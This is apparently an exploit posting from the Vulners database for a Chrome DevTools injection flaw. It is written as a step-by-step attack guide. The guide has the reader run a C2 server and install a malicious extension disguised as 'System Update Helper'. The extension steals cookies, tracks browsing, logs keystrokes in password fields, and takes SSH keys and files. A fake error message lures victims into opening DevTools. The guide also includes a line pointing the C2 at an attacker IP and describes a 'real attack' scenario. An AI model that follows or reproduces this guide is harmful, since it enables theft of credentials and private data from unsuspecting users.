Vulners
Lucene search
📄 Google Chrome 145.0.7632.117 DevTools Injection
=============================================================================================================================================
| # Title : Google Chrome 145.0.7632.117 High-Severity DevTools Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.google.com |
=============================================================================================================================================
[+] Summary : A high-severity vulnerability was identified in the DevTools component of Google Chrome versions prior to 145.0.7632.117.
The issue stems from an inappropriate implementation that allowed insufficient isolation between Chrome extensions and privileged DevTools pages.
If a user was convinced to install a malicious browser extension, the extension could exploit this flaw to inject arbitrary scripts or HTML into a privileged DevTools page.
This could potentially lead to exposure of sensitive information accessible within that privileged context.
The vulnerability does not allow remote exploitation without user interaction and does not directly result in sandbox escape or operating system compromise.
However, due to the privileged nature of DevTools pages, the impact was rated High by the Google security team.
[+] POC :
How does this scenario work? ===> https://youtu.be/oFLvPWdp4X4
The malicious extension is installed.
The extension starts a phishing.html page and prompts the user to open DevTools, claiming an error message.
When DevTools is opened, the malicious code (payload) is executed within the page context, allowing data theft or communication with the host.
Ideas
Add-on permissions: For these codes to work, the add-on must request permissions such as "tabs", "devtools", and "<all_urls>" in the Manifest.json file.
[+] Step 1: Server Setup (Attacker Side)
1.1 Install Requirements : pip install flask flask-cors
1.2 Run the Server
download : https://github.com/indoushka/chromium/ =====> cd chromium ========> python sever-C2.py
Expected Output:
C2 Server running on http://0.0.0.0:8080
Dashboard: http://localhost:8080/dashboard
[+] Step 2: Extension Installation (Victim Side)
2.1 Prepare Extension Files
Place all files in a single folder (e.g., chromium/extension/).
2.2 Install the Extension in Chrome
Open chrome://extensions.
Enable Developer mode (toggle in the top right).
Click Load unpacked.
Select the folder containing the extension files.
Installation Confirmation: The extension should appear in the list named "System Update Helper".
[+] Step 3: How the Exploit Works
3.1 Automatic Data Collection (No Victim Interaction)
Once the extension is installed, it automatically begins:
Function Timing Result
Cookie Theft Upon installation Cookies are sent to the server
Extension Discovery Upon installation List of installed extensions is sent
Page Tracking During browsing Every page the victim visits is logged
Heartbeat Every minute Confirms the extension is still active
3.2 Exploiting Privileged Pages (Requires Victim Interaction)
When the victim opens a privileged page such as chrome://settings or chrome://downloads:
A red message appears requesting the user to open DevTools:
Page Error - Press F12 to open Developer Tools and fix the issue
If the victim presses F12, the exploit code executes.
Automatic file theft begins:
C:/Windows/System32/drivers/etc/hosts
C:/Users/Public/Documents/passwords.txt
SSH files and system keys.
3.3 Keylogging
When the victim types in any password field:
Plaintext
Keylogger installed
Key logged: a
Key logged: b...
Every keystroke is sent to the server immediately.
[+] Step 4: Monitoring Stolen Data (Attacker Side)
4.1 Open the Control Panel
In the browser, open: http://localhost:8080/dashboard
4.2 Reading the Data
Section What you see
Pages All pages visited by the victim
Cookies Stolen cookies (including tokens)
Files Files stolen from the victim's device
Keys Keystrokes (passwords)
Extensions Other installed extensions
4.3 Saved Files
collected.json: All data in JSON format.
stored_*.txt: Stolen files.
keystrokes.log: Keystroke log.
passwords.txt: Extracted passwords.
[+] Practical Usage Scenarios
Scenario 1: Testing on a Single Device
[Your Device] ← Acts as both attacker and victim
Run the server: python sever-C2.py
Install the extension on the same device.
Open the dashboard: http://localhost:8080
Browse normal sites and chrome://pages.
[+] Scenario 2: Real Attack (Two Devices)
Victim Device Attacker Device
Installs the extension Runs the server on a real IP
Opens chrome://settings IP: 192.168.1.100:8080
Presses F12 Opens the dashboard
Files are stolen Sees data instantly
Minor Adjustment: Change the C2 address in background.js to the attacker's IP : const C2 = 'http://192.168.1.100:8080'; // The attacker's real IP
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9